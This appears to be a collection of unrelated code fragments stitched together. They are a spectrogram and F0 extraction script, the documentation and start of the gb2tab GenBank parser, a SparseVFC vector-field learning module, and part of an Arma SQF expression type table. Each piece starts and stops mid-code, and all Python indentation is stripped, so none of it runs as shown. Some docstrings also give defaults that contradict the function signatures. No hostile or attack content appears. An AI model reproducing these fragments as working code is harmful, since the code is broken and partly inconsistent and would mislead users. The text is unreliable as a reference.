nV_veusz = np.load(filepathstr + '_spectrogram_nV_veusz.npy')
# --- plot response spectrogram ---
fig102 = plt.figure(102)
plt.imshow(nV_veusz, origin='lower', extent=(left, right, bottom, top), aspect='auto', cmap=dict_colorMap.get(colorMap_recording)) # , vmin=0, vmax=8000) # set zero origin at lower left corner, define the extent of axis boundaries (so that the x and y tick numbers will be correct), set aspect ratio to 'auto' (so that the spectrogram image will fill in the entire space), set color map to 'jet' for color and 'gray_r' for gray scale, set vmin and vmax for the lower and upper limits along the z axis (i.e., amplitude axis)
plt.title(annotationRecording)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
plt.xticks(ticks=xticks)
# plt.colorbar()
if setFigureLocationFlag:
if 'Qt' in backend: # Qt (e.g., Qt5Agg)
mgr = plt.get_current_fig_manager() # get a manager for current figure
mgr.window.setGeometry(space+dx+space, space, dx, dy) # set geometry of current figure (x, y, width, height) in pixels
else:
sys.exit('Unrecognizable graphical backend')
plt.show(block=False)
###############################
# --- Find spectral maximum ---
###############################
#----------------- extract f0s for stimulus ----------------
if stimToken not in stimTokens: # compute stimulus f0s, only upon the first encounter of a stimToken
stimTokens.append(stimToken)
highIndices = np.argwhere(F <= high) # find the upper frequency index of the searching range
highIndex = highIndices[-1, 0] + 1
lowIndices = np.argwhere(F >= low) # find the lower frequency index of the searching range
lowIndex = lowIndices[0, 0]
F_range = F[lowIndex:highIndex]
nV_S_range = nV_S[lowIndex:highIndex, :]
# in the range of T_ms, find the maximum y and its index
f0amps = np.full(T_ms.shape, None)
indices = np.full(T_ms.shape, None)
for i in range(len(T_ms)):
f0amps[i] = np.amax(nV_S_range[:, i])
indices[i] = np.argmax(nV_S_range[:, i])
# use the index to find the corresponding frequency
f0s = np.full(T_ms.shape, None)
for j in range(len(T_ms)):
f0s[j] = F_range[indices[j]]
f0s = f0s.astype(float) # force f0s to float64
# output f0s
np.save(f0ContourPath + 'f0_' + stimToken + '.npy', f0s)
else:
f0s = np.load(f0ContourPath + 'f0_' + stimToken + '.npy', allow_pickle=True)
# --- plot stimulus f0s ---
fig103 = plt.figure(103)
plt.plot(T_ms, f0s, 'k') # {b: blue, k: black, r: red, etc}, {o: circle, +: plus, x: cross, etc}
plt.title('F0s of the stimulus, ' + stimToken)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
if setFigureLocationFlag:
if 'Qt' in backend: # Qt (e.g., Qt5Agg)
mgr = plt.get_current_fig_manager() # get a manager for current figure
mgr.window.setGeometry(space, int(space+dy*6/10+space), dx, dy) # set geometry of current figure (x, y, width, height) in pixels
elif 'wx' in backend:
print('wx backend')
else:
sys.exit('Unrecognizable graphical backend')
plt.show(block=False)
#----------------- extract f0s for a recording ----------------
highIndices = np.argwhere(f <= high) # find the upper frequency index of the searching range
highIndex = highIndices[-1, 0] + 1
lowIndices = np.argwhere(f >= low) # find the lower frequency index of the searching range
lowIndex = lowIndices[0, 0]
f_range = f[lowIndex:highIndex]
nV_range = nV[lowIndex:highIndex, :]
# in the range of T_ms, find the maximum y and its index
f0amp = np.full(t_ms.shape, None)
index = np.full(t_ms.shape, None)
for i in range(len(t_ms)):
f0amp[i] = np.amax(nV_range[:, i])
index[i] = np.argmax(nV_range[:, i])
# use the index to find the corresponding frequency
f0 = np.full(t_ms.shape, None)
for j in range(len(t_ms)):
f0[j] = f_range[index[j]]
f0 = f0.astype(float) # force f0 to float64
# calculate Spectral Amplitude (SA)
sa = np.mean(abs(f0amp))
# --- plot response f0s ---
fig104 = plt.figure(104)
plt.plot(t_ms, f0, 'r')
plt.title('F0s of a recording, ' + annotationRecording)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
| |
<gh_stars>1-10
#!/usr/local/python/bin/python
# gb2tab - comprehensive GenBank format parser/extractor
#
# Copyright (C) 2004 - 2008 <NAME>, <EMAIL>
#
# gb2tab is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# gb2tab is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
"""
gb2tab v 1.2.1 (command line program behind the FeatureExtract webserver)
NAME
gb2tab - extract sequence and annotation (intron/exon etc)
from GenBank format files.
SYNOPSIS
gb2tab [-f 'CDS,mRNA,...'] [options...] [files...]
DESCRIPTION
gb2tab is a tool for extracting sequence and annotation
(such as intron / exon structure) information from GenBank
format files.
This tool handles overlapping genes gracefully.
If no files are specified input is assumed to be on STDIN.
Several GenBank files can be concatenated to STDIN.
The extracted sequences are streamed to STDOUT with one
entry per line in the following format (tab separated):
name seq ann com
name: The sequence id. See the --genename, --locustag and
--entryname options below.
seq: The DNA sequence it self. UPPERCASE is used for the
main sequence, lowercase is used for flanks (if any).
ann: Single letter sequence annotation. Position for position
the annotation descripes the DNA sequence: The first
letter in the annotation, descriped the annotation for
the first position in the DNA sequence and so forth.
The annotation code is defined as follows:
FEATURE BLOCKS (AKA. "EXON BLOCKS")
( First position
E Exon
T tRNA exonic region
R rRNA / generic RNA exonic region
P Promotor
X Unknown feature type
) Last position
? Ambiguous first or last position
[ First UTR region position
3 3'UTR
5 5'UTR
] Last UTR region position
See also the --block-chars option, for a further
explanation of feature blocks and exonic regions.
INTRONS and FRAMESHIFTS
D First intron position (donor site)
I Intron position
A Last intron position (acceptor site)
< Start of frameshift
F Frameshift
> End of frameshift
REGIONS WITHOUT FEATURES
. NULL annotation (no annotation).
ONLY IN FLANKING REGIONS:
+ Other feature defined on the SAME STRAND
as the current entry.
- Other feature defined on the OPPOSITE STRAND
relative to the current entry.
# Multiple or overlapping features.
A..Z: Feature on the SAME STRAND as the current entry.
a..z: Feature on the OPPOSITE STRAND as the current entry.
See the -e option for a description of which features
are annotated in the flanking regions.
The options --flank_ann_full (default) and
--flank_ann_presence determine if full annotation
(+upper/lower case) or annotation of presence/absence
(+/- and #) is used.
com: Comments (free text). All text, extra information etc
defined in the GenBank files are concatenated into a single
comment.
The following extra information is added by this program:
*) GenBank accession ID.
*) Source (organism)
*) Feature type (e.g. "CDS" or "rRNA")
*) Strand ("+" or "-").
*) Spliced DNA sequence. Simply the DNA sequence defined
by the JOIN statement.
This is provied for two reasons. 1) To overcome negative
frameshifts. 2) As an easy way of extracting the sequence
of the spliced producted. See also the --splic_always and
--flank_splic options below.
*) Spliced DNA annotation.
OPTIONS
The following options are available.
-f X, --feature_type=X
Define which feature type(s) to extract.
Default is 'CDS' which is the most general way
to annotate protein coding genes.
Multiple features can be selected by specifying a comma
separated list - for example "CDS,rRNA,tRNA".
Special keywords:
ALL: Using the keyword "ALL", will extend the list to all
feature types listed in each GenBank file.
Please notice: This can occationally lead to problems
in files that use multiple feature types to cover the
same actual feature (e.g uses both "gene" and "CDS").
MOST: Covers the following feature types:
CDS,3'UTR,5'UTR,
promoter,-35_signal,-10_signal,RBS,
rRNA,tRNA,snoRNA,scRNA,misc_RNA,
misc_feature
The keyword can be also be included in the user specified list.
For example "MOST,novel_feature" will construct a list containing
the list mention above + the new feature type "novel_feature".
-e X, --flank_features=X
Define which features to annotate in flanking regions.
The scheme for specifying features is the same as in the
-f option (see above).
The default value is "MOST".
If no flanking regions are requested (see options -b and -a
below) this option is ignored.
-i, --intergenic
Extract intergenic regions. When this options is used all
regions in between the features defined with the -f options
in extracted rahter than the features themselves.
Please notice that features specified using the -e options
may be present in the intergenic regions.
Intergenic regions will always be extracted from the "+" strand.
-s, --splice
For intron containing sequences output the spliced version as
the main result (normally this information goes into the
comments). If this options is used the full length product will
be added to the comments instead.
Using this option will force the inclusion of flanks (if any)
in the spliced product. See also option --flank_splic.
-x, --spliced_only
Only output intron containing sequences. Can the used in
combination with the -s option.
-b X, --flank_before=X
Extract X basepairs upstream of each sequence.
-a X, --flank_after=X
Extract X basepairs downstream of each sequence.
-h, --help
Print this help page and exit.
-n, --dry-run
Run through all extraction steps but do not output any
data. Useful for debugging bad GenBank files in combination
with the verbose options.
-v, --verbose
Output messages about progess, details about the GenBank
file etc. to STDERR. Useful for finding errors.
-q, --quiet
Suppress all warnings, error messages and verbose info.
The exit value will still be non-zero if an error is
encountered.
--flank_ann_presence
Annotate presence/absence and relative strandness of
features in the flanking regions.
Features - of any kind - are annotated with "+" if they are
on the SAME STRAND as the extratced feature, and "-" if they
are on the OPPOSITE STRAND. "#" marks regions covered by
multiple features.
This option is very useful for use with OligoWiz-2.0
(www.cbs.dtu.dk/services/OligoWiz2).
--flank_ann_full
Default: Include full-featured annotation in the flanking regions.
Features on the SAME STRAND as the extracted is uppercase -
features on the OPPOSITE STRAND is lowercase.
In case of regions covered by multiple features, the
feature defined FIRST by the -e option has preference.
--flank_splic
Also include flanking regions in the spliced product.
Default is to ignore flanks.
--splic_always
Include spliced producted for ALL entries.
Default is to only print spliced product information for
intron/frameshift containing entries.
--frameshift=X
"Introns" shorter than X bp (default 15bp) are considered
frameshifts. This includes negative frameshifts.
--block-chars=XYZ|"Feat1=XYZ,Feat2=ZYX,..."
Specify which characters to use for annotation of the
extracted feature types. For spliced feature (e.g CDS)
each exonic block is annotated using the specified characters.
Three characters must be supplied (for each feature type):
First position, internal positions, last position.
For example the string "(E)" will cause a 10bp feature block
(e.i a CDS exon block) to be annotated like this: (EEEEEEEE)
Introns are filled in as DII..IIA
By default the program determine the annotation chars to be
based on the type of feature being extracted:
(E) CDS, mRNA
(T) tRNA
(R) rRNA, snoRNA, snRNA, misc_RNA, scRNA
(P) promotor
[5] 5'UTR
[3] 3'UTR
(X) Everything else.
This table can be expanded (and overwritten) by supplying a
list of relations between feature type ans block chars.
For example:
--block-chars="mRNA=[M],gene=<G>,repeat=QQQ"
--genename
Try to extract the gene name from the /gene="xxxx"
tag (this is usually the classical gene name, e.g. HTA1)
If this is not possible fall back to 1) locustag
or 2) entryname (see below).
--locustag
Try to extract the locus tag (usually the systematic
gene name) from the /locus_tag="xxxx" tag. Fall back
to using the entryname if not possible (see below).
This is the default behavior.
--entryname
Use the main GenBank entry name (the "LOCUS" name) as
the base of the sequence names.
KNOWN ISSUES
This program DOES NOT support entries which spans multiple
GenBank files. It is very unlikely this will ever be supported.
(Please notice that the webserver version supports expanding
reference GenBank entries to the listed subentries automatically).
REFERENCE
<NAME>, 2005.
"FeatureExtract - extraction of sequence annotation made easy".
Nucleic Acids Research, 2005, Vol. 33, Web Server issue W567-W569
WEB
http://www.cbs.dtu.dk/services/FeatureExtract
The webpage contains detailed instructions and examples.
The most recent version of this program is downloadable
from this web address.
AUTHOR
<NAME>, <EMAIL>
Oct-Dec 2004
Jan-Mar 2005
Aug 2005
Sep 2008 - bugfix + better IUPAC support
"""
import sys,string,re
# The Exception is used for communicating the end of the input stream has be reached
class ExEndOfFile(Exception):
pass
# The class is basically just a slightly intelligent record (it knows how to be
# sorted) that stores the processed information for each feature block.
class Rec:
def __init__(self):
self.first = -1
self.last = -1
self.comp = False
self.strand = "+"
self.strSeq = ""
self.strAnn = ""
self.strSpliced = ""
self.strSpcAnn = ""
self.featType = | |
<gh_stars>1-10
import numpy as np
import scipy
import numpy.matlib
def norm(X, V, T):
"""Normalizes the X, Y (X + V) matrix to have zero means and unit covariance.
We use the mean of X, Y's center and scale parameters to normalize T.
Arguments
---------
X: 'np.ndarray'
Current state. This corresponds to, for example, the spliced transcriptomic state.
V: 'np.ndarray'
Velocity estimates in delta t. This corresponds to, for example, the inferred spliced transcriptomic velocity estimated calculated by dynamo or velocyto, scvelo.
T: 'np.ndarray'
Current state on a grid which is often used to visualize the vector field. This corresponds to, for example, the spliced transcriptomic state.
Returns
-------
Add norm_dict to the class which includes the mean and scale values for X, Y used in normalizing the data.
"""
Y = X + V
n, m = X.shape[0], V.shape[0]
xm = np.mean(X, 0)
ym = np.mean(Y, 0)
x, y, t = X - xm[None, :], Y - ym[None, :], T - (1/2 * (xm[None, :] + ym[None, :]))
xscale, yscale = np.sqrt(np.sum(np.sum(x**2, 1)) / n), np.sqrt(np.sum(np.sum(y**2, 1)) / m)
X, Y, T = x / xscale, y / yscale, t / (1/2 * (xscale + yscale))
X, V, T = X, Y - X, T
norm_dict = {"xm": xm, "ym": ym, "xscale": xscale, "yscale": yscale}
return X, V, T, norm_dict
def auto_con_K(self, x, y, beta):
"""Con_K constructs the kernel K, where K(i, j) = k(x, y) = exp(-beta * ||x - y||^2).
Arguments
---------
x: 'np.ndarray'
Original training data points.
y: 'np.ndarray'
control points used to build kernel basis functions
beta: 'np.ndarray'
The function that returns diffusion matrix which can be dependent on the variables (for example, genes)
Returns
-------
K: 'np.ndarray'
the kernel to represent the vector field function.
"""
n, d = x.shape
m, d = y.shape
# https://stackoverflow.com/questions/1721802/what-is-the-equivalent-of-matlabs-repmat-in-numpy
# https://stackoverflow.com/questions/12787475/matlabs-permute-in-python
K = np.matlib.tile(x[:, :, None], [1, 1, m]) - np.transpose(np.matlib.tile(y[:, :, None], [1, 1, n]), [2, 1, 0])
K = np.squeeze(np.sum(K**2, 1))
K = - beta * K
K = np.exp(K) #
return K
def SparseVFC(X, Y, Grid, M = 100, a = 5, beta = 0.1, ecr = 1e-5, gamma = 0.9, lambda_ = 3, minP = 1e-5, MaxIter = 500, theta = 0.75, div_cur_free_kernels = False):
"""Apply sparseVFC (vector field consensus) algorithm to learn a functional form of the vector field on the entire space robustly and efficiently.
Reference: Regularized vector field learning with sparse approximation for mismatch removal, Ma, Jiayi, etc. al, Pattern Recognition
Arguments
---------
X: 'np.ndarray'
Current state. This corresponds to, for example, the spliced transcriptomic state.
Y: 'np.ndarray'
Velocity estimates in delta t. This corresponds to, for example, the inferred spliced transcriptomic velocity estimated calculated by velocyto, scvelo or dynamo.
Grid: 'np.ndarray'
Current state on a grid which is often used to visualize the vector field. This corresponds to, for example, the spliced transcriptomic state.
M: 'int' (default: 100)
The number of basis functions to approximate the vector field.
a: 'float' (default: 10)
Paramerter of the model of outliers. We assume the outliers obey uniform distribution, and the volume of outlier's variation space is a.
beta: 'float' (default: 0.1)
Paramerter of Gaussian Kernel, k(x, y) = exp(-beta*||x-y||^2),
ecr: 'float' (default: 1e-5)
The minimum limitation of energy change rate in the iteration process.
gamma: 'float' (default: 0.9)
Percentage of inliers in the samples. This is an inital value for EM iteration, and it is not important.
lambda_: 'float' (default: 0.3)
Represents the trade-off between the goodness of data fit and regularization.
minP: 'float' (default: 1e-5)
The posterior probability Matrix P may be singular for matrix inversion. We set the minimum value of P as minP.
MaxIter: 'int' (default: 500)
Maximum iterition times.
theta: 'float' (default: 0.75)
Define how could be an inlier. If the posterior probability of a sample is an inlier is larger than theta, then it is regarded as an inlier.
Returns
-------
VecFld: 'dict'
A dictionary which contains X, Y, beta, V, C, P, VFCIndex. Where V = f(X), P is the posterior probability and
VFCIndex is the indexes of inliers which found by VFC. Note that V = con_K(Grid, ctrl_pts, beta).dot(C) gives the prediction of velocity on Grid (can be any point in the gene expressionstate space).
"""
N, D = Y.shape
# Construct kernel matrix K
M = 500 if M is None else M
tmp_X = np.unique(X, axis = 0) # return unique rows
idx = np.random.RandomState(seed=0).permutation(tmp_X.shape[0]) # rand select some intial points
idx = idx[range(min(M, tmp_X.shape[0]))]
ctrl_pts = tmp_X[idx, :]
# ctrl_pts = X[range(500), :]
K = con_K(ctrl_pts, ctrl_pts, beta) if div_cur_free_kernels is False else con_K_div_cur_free(ctrl_pts, ctrl_pts)[0]
U = con_K(X, ctrl_pts, beta) if div_cur_free_kernels is False else con_K_div_cur_free(X, ctrl_pts)[0]
grid_U = con_K(Grid, ctrl_pts, beta) if div_cur_free_kernels is False else con_K_div_cur_free(Grid, ctrl_pts)[0]
M = ctrl_pts.shape[0]
# Initialization
V = np.zeros((N, D))
C = np.zeros((M, D))
iter, tecr, E = 1, 1, 1
sigma2 = sum(sum((Y - V)**2)) / (N * D) ## test this
while iter < MaxIter and tecr > ecr and sigma2 > 1e-8:
# E_step
E_old = E
P, E = get_P(Y, V, sigma2, gamma, a)
E = E + lambda_ / 2 * scipy.trace(C.T.dot(K).dot(C))
tecr = abs((E - E_old) / E)
# print('iterate: {}, gamma: {}, the energy change rate: {}, sigma2={}\n'.format(*[iter, gamma, tecr, sigma2]))
# M-step. Solve linear system for C.
P = scipy.maximum(P, minP)
C = scipy.linalg.lstsq(((U.T * numpy.matlib.repmat(P.T, M, 1)).dot(U) + lambda_ * sigma2 * K), \
(U.T * numpy.matlib.repmat(P.T, M, 1)).dot(Y))[0]
# Update V and sigma**2
V = U.dot(C)
Sp = sum(P)
sigma2 = sum(P.T * np.sum((Y - V)**2, 1)) / np.dot(Sp, D)
# Update gamma
numcorr = len(np.where(P > theta)[0])
gamma = numcorr / X.shape[0]
if gamma > 0.95:
gamma = 0.95
elif gamma < 0.05:
gamma = 0.05
iter += 1
grid_V = np.dot(grid_U, C)
VecFld = {"X": ctrl_pts, "Y": Y, "beta": beta, "V": V, "C": C, "P": P, "VFCIndex": np.where(P > theta)[0], "sigma2": sigma2, "grid": Grid, "grid_V": grid_V}
return VecFld
def con_K(x, y, beta):
"""Con_K constructs the kernel K, where K(i, j) = k(x, y) = exp(-beta * ||x - y||^2).
Arguments
---------
x: 'np.ndarray'
Original training data points.
y: 'np.ndarray'
Control points used to build kernel basis functions.
beta: 'float' (default: 0.1)
Paramerter of Gaussian Kernel, k(x, y) = exp(-beta*||x-y||^2),
Returns
-------
K: 'np.ndarray'
the kernel to represent the vector field function.
"""
n, d = x.shape
m, d = y.shape
# https://stackoverflow.com/questions/1721802/what-is-the-equivalent-of-matlabs-repmat-in-numpy
# https://stackoverflow.com/questions/12787475/matlabs-permute-in-python
K = np.matlib.tile(x[:, :, None], [1, 1, m]) - np.transpose(np.matlib.tile(y[:, :, None], [1, 1, n]), [2, 1, 0])
K = np.squeeze(np.sum(K**2, 1))
K = - beta * K
K = np.exp(K) #
return K
def get_P(Y, V, sigma2, gamma, a):
"""GET_P estimates the posterior probability and part of the energy.
Arguments
---------
Y: 'np.ndarray'
Original data.
V: 'np.ndarray'
Original data.
sigma2: 'float'
sigma2 is defined as sum(sum((Y - V)**2)) / (N * D)
gamma: 'float'
Percentage of inliers in the samples. This is an inital value for EM iteration, and it is not important.
a: 'float'
Paramerter of the model of outliers. We assume the outliers obey uniform distribution, and the volume of outlier's variation space is a.
Returns
-------
P: 'np.ndarray'
Posterior probability, related to equation 27.
E: `np.ndarray'
Energy, related to equation 26.
"""
D = Y.shape[1]
temp1 = np.exp(-np.sum((Y - V)**2, 1) / (2 * sigma2))
temp2 = (2 * np.pi * sigma2)**(D/2) * (1 - gamma) / (gamma * a)
temp1[temp1==0] = np.min(temp1[temp1!=0])
P = temp1 / (temp1 + temp2)
E = P.T.dot(np.sum((Y - V)**2, 1)) / (2 * sigma2) + np.sum(P) * np.log(sigma2) * D / 2
return P, E
class VectorField:
def __init__(self, X, V, Grid, M=100, a=5, beta=0.1, ecr=1e-5, gamma=0.9, lambda_=3, minP=1e-5, MaxIter=500, theta=0.75, div_cur_free_kernels=False):
"""Initialize the VectorField class.
Parameters
----------
X: 'np.ndarray' (dimension: n_obs x n_features)
Original data.
V: 'np.ndarray' | |
Anything),
BinaryExpression(Group, Keyword('deletegroupwhenempty'), Boolean, Nothing),
BinaryExpression(Array, Keyword('deleterange'), Array, Nothing),
BinaryExpression(TeamMember, Keyword('deleteresources'), Array, Nothing),
BinaryExpression(Object, Keyword('deletevehiclecrew'), Object, Nothing),
BinaryExpression(Object, Keyword('diarysubjectexists'), String, Boolean),
BinaryExpression(Object, Keyword('directsay'), String, Nothing),
BinaryExpression(Object, Keyword('disableai'), String, Nothing),
BinaryExpression(Object, Keyword('disablecollisionwith'), Object, Nothing),
BinaryExpression(Object, Keyword('disableconversation'), Boolean, Nothing),
BinaryExpression(Object, Keyword('disablenvgequipment'), Boolean, Nothing),
BinaryExpression(Object, Keyword('disabletiequipment'), Boolean, Nothing),
BinaryExpression(Object, Keyword('disableuavconnectability'), Array, Nothing),
BinaryExpression(Display, Keyword('displayaddeventhandler'), Array, Number),
BinaryExpression(Display, Keyword('displayctrl'), Number, Control),
BinaryExpression(Display, Keyword('displayremovealleventhandlers'), String, Nothing),
BinaryExpression(Display, Keyword('displayremoveeventhandler'), Array, Nothing),
BinaryExpression(Display, Keyword('displayseteventhandler'), Array, Nothing),
BinaryExpression(Object, Keyword('distance'), Object, Number),
BinaryExpression(Object, Keyword('distance'), Array, Number),
BinaryExpression(Array, Keyword('distance'), Object, Number),
BinaryExpression(Array, Keyword('distance'), Array, Number),
BinaryExpression(Location, Keyword('distance'), Location, Number),
BinaryExpression(Location, Keyword('distance'), Array, Number),
BinaryExpression(Array, Keyword('distance'), Location, Number),
BinaryExpression(Object, Keyword('distance2d'), Object, Number),
BinaryExpression(Object, Keyword('distance2d'), Array, Number),
BinaryExpression(Array, Keyword('distance2d'), Object, Number),
BinaryExpression(Array, Keyword('distance2d'), Array, Number),
BinaryExpression(Object, Keyword('distancesqr'), Object, Number),
BinaryExpression(Object, Keyword('distancesqr'), Array, Number),
BinaryExpression(Array, Keyword('distancesqr'), Object, Number),
BinaryExpression(Array, Keyword('distancesqr'), Array, Number),
BinaryExpression(Location, Keyword('distancesqr'), Location, Number),
BinaryExpression(Location, Keyword('distancesqr'), Array, Number),
BinaryExpression(Array, Keyword('distancesqr'), Location, Number),
BinaryExpression(WhileType, Keyword('do'), Code, Nothing),
BinaryExpression(WithType, Keyword('do'), Code, Nothing),
BinaryExpression(ForType, Keyword('do'), Code, Anything),
BinaryExpression(SwitchType, Keyword('do'), Code, Anything),
BinaryExpression(Object, Keyword('doartilleryfire'), Array, Nothing),
BinaryExpression(Array, Keyword('doartilleryfire'), Array, Nothing),
BinaryExpression(Object, Keyword('dofire'), Object, Nothing),
BinaryExpression(Array, Keyword('dofire'), Object, Nothing),
BinaryExpression(Object, Keyword('dofollow'), Object, Nothing),
BinaryExpression(Array, Keyword('dofollow'), Object, Nothing),
BinaryExpression(Object, Keyword('dofsm'), Array, Nothing),
BinaryExpression(Array, Keyword('dofsm'), Array, Nothing),
BinaryExpression(Object, Keyword('domove'), Array, Nothing),
BinaryExpression(Array, Keyword('domove'), Array, Nothing),
BinaryExpression(Object, Keyword('doorphase'), String, Number),
BinaryExpression(Object, Keyword('dosuppressivefire'), Object, Nothing),
BinaryExpression(Object, Keyword('dosuppressivefire'), Array, Nothing),
BinaryExpression(Array, Keyword('dosuppressivefire'), Object, Nothing),
BinaryExpression(Array, Keyword('dosuppressivefire'), Array, Nothing),
BinaryExpression(Object, Keyword('dotarget'), Object, Nothing),
BinaryExpression(Array, Keyword('dotarget'), Object, Nothing),
BinaryExpression(Object, Keyword('dowatch'), Array, Nothing),
BinaryExpression(Array, Keyword('dowatch'), Array, Nothing),
BinaryExpression(Object, Keyword('dowatch'), Object, Nothing),
BinaryExpression(Array, Keyword('dowatch'), Object, Nothing),
BinaryExpression(Control, Keyword('drawarrow'), Array, Nothing),
BinaryExpression(Control, Keyword('drawellipse'), Array, Nothing),
BinaryExpression(Control, Keyword('drawicon'), Array, Nothing),
BinaryExpression(Control, Keyword('drawline'), Array, Nothing),
BinaryExpression(Control, Keyword('drawlink'), Array, Nothing),
BinaryExpression(Control, Keyword('drawlocation'), Location, Nothing),
BinaryExpression(Control, Keyword('drawpolygon'), Array, Nothing),
BinaryExpression(Control, Keyword('drawrectangle'), Array, Nothing),
BinaryExpression(Control, Keyword('drawtriangle'), Array, Nothing),
BinaryExpression(Control, Keyword('editobject'), String, Anything),
BinaryExpression(Control, Keyword('editorseteventhandler'), Array, Nothing),
BinaryExpression(Code, Keyword('else'), Code, Array),
BinaryExpression(Object, Keyword('emptypositions'), String, Number),
BinaryExpression(Object, Keyword('enableai'), String, Nothing),
BinaryExpression(String, Keyword('enableaifeature'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableaimprecision'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableattack'), Boolean, Nothing),
BinaryExpression(Group, Keyword('enableattack'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableautostartuprtd'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableautotrimrtd'), Boolean, Boolean),
BinaryExpression(Number, Keyword('enablechannel'), Boolean, Nothing),
BinaryExpression(Number, Keyword('enablechannel'), Array, Nothing),
BinaryExpression(Object, Keyword('enablecollisionwith'), Object, Nothing),
BinaryExpression(Object, Keyword('enablecopilot'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enabledynamicsimulation'), Boolean, Nothing),
BinaryExpression(Group, Keyword('enabledynamicsimulation'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablefatigue'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablegunlights'), String, Nothing),
BinaryExpression(Group, Keyword('enablegunlights'), String, Nothing),
BinaryExpression(Object, Keyword('enableinfopanelcomponent'), Array, Boolean),
BinaryExpression(Array, Keyword('enableinfopanelcomponent'), Array, Boolean),
BinaryExpression(Object, Keyword('enableirlasers'), Boolean, Nothing),
BinaryExpression(Group, Keyword('enableirlasers'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablemimics'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablepersonturret'), Array, Nothing),
BinaryExpression(Object, Keyword('enablereload'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableropeattach'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablesimulation'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablesimulationglobal'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablestamina'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enableuavconnectability'), Array, Nothing),
BinaryExpression(Object, Keyword('enableuavwaypoints'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablevehiclecargo'), Boolean, Nothing),
BinaryExpression(Object, Keyword('enablevehiclesensor'), Array, Nothing),
BinaryExpression(Object, Keyword('enableweapondisassembly'), Boolean, Nothing),
BinaryExpression(Object, Keyword('engineon'), Boolean, Nothing),
BinaryExpression(Control, Keyword('evalobjectargument'), Array, Anything),
BinaryExpression(Type, Keyword('exec'), String, Nothing),
BinaryExpression(Control, Keyword('execeditorscript'), Array, Anything),
BinaryExpression(Type, Keyword('execfsm'), String, Number),
BinaryExpression(Type, Keyword('execvm'), String, Script),
BinaryExpression(IfType, Keyword('exitwith'), Code, Anything),
BinaryExpression(Number, Keyword('fademusic'), Number, Nothing),
BinaryExpression(Number, Keyword('faderadio'), Number, Nothing),
BinaryExpression(Number, Keyword('fadesound'), Number, Nothing),
BinaryExpression(Number, Keyword('fadespeech'), Number, Nothing),
BinaryExpression(Array, Keyword('find'), Type, Number),
BinaryExpression(String, Keyword('find'), String, Number),
BinaryExpression(Object, Keyword('findcover'), Array, Object),
BinaryExpression(Control, Keyword('findeditorobject'), Array, String),
BinaryExpression(Control, Keyword('findeditorobject'), Type, String),
BinaryExpression(Array, Keyword('findemptyposition'), Array, Array),
BinaryExpression(Array, Keyword('findemptypositionready'), Array, Boolean),
BinaryExpression(Array, Keyword('findif'), Code, Number),
BinaryExpression(Object, Keyword('findnearestenemy'), Object, Object),
BinaryExpression(Object, Keyword('findnearestenemy'), Array, Object),
BinaryExpression(Object, Keyword('fire'), String, Nothing),
BinaryExpression(Object, Keyword('fire'), Array, Nothing),
BinaryExpression(Object, Keyword('fireattarget'), Array, Boolean),
BinaryExpression(Object, Keyword('flyinheight'), Number, Nothing),
BinaryExpression(Object, Keyword('flyinheightasl'), Array, Nothing),
BinaryExpression(Object, Keyword('forceadduniform'), String, Nothing),
BinaryExpression(Object, Keyword('forceflagtexture'), String, Nothing),
BinaryExpression(Object, Keyword('forcefollowroad'), Boolean, Nothing),
BinaryExpression(Object, Keyword('forcespeed'), Number, Nothing),
BinaryExpression(Object, Keyword('forcewalk'), Boolean, Nothing),
BinaryExpression(Object, Keyword('forceweaponfire'), Array, Nothing),
BinaryExpression(Code, Keyword('foreach'), Array, Nothing),
BinaryExpression(Code, Keyword('foreachmember'), TeamMember, Nothing),
BinaryExpression(Code, Keyword('foreachmemberagent'), TeamMember, Nothing),
BinaryExpression(Code, Keyword('foreachmemberteam'), TeamMember, Nothing),
BinaryExpression(Object, Keyword('forgettarget'), Object, Nothing),
BinaryExpression(Group, Keyword('forgettarget'), Object, Nothing),
BinaryExpression(ForType, Keyword('from'), Number, ForType),
BinaryExpression(Object, Keyword('get3denattribute'), String, Array),
BinaryExpression(Group, Keyword('get3denattribute'), String, Array),
BinaryExpression(Array, Keyword('get3denattribute'), String, Array),
BinaryExpression(String, Keyword('get3denattribute'), String, Array),
BinaryExpression(Number, Keyword('get3denattribute'), String, Array),
BinaryExpression(String, Keyword('get3denmissionattribute'), String, Anything),
BinaryExpression(Object, Keyword('getartilleryeta'), Array, Number),
BinaryExpression(Object, Keyword('getcargoindex'), Object, Number),
BinaryExpression(Object, Keyword('getcompatiblepylonmagazines'), String, Array),
BinaryExpression(Object, Keyword('getcompatiblepylonmagazines'), Number, Array),
BinaryExpression(String, Keyword('getcompatiblepylonmagazines'), String, Array),
BinaryExpression(String, Keyword('getcompatiblepylonmagazines'), Number, Array),
BinaryExpression(Object, Keyword('getdir'), Object, Number),
BinaryExpression(Object, Keyword('getdir'), Array, Number),
BinaryExpression(Array, Keyword('getdir'), Object, Number),
BinaryExpression(Array, Keyword('getdir'), Array, Number),
BinaryExpression(Control, Keyword('geteditorobjectscope'), String, String),
BinaryExpression(Array, Keyword('getenvsoundcontroller'), String, Number),
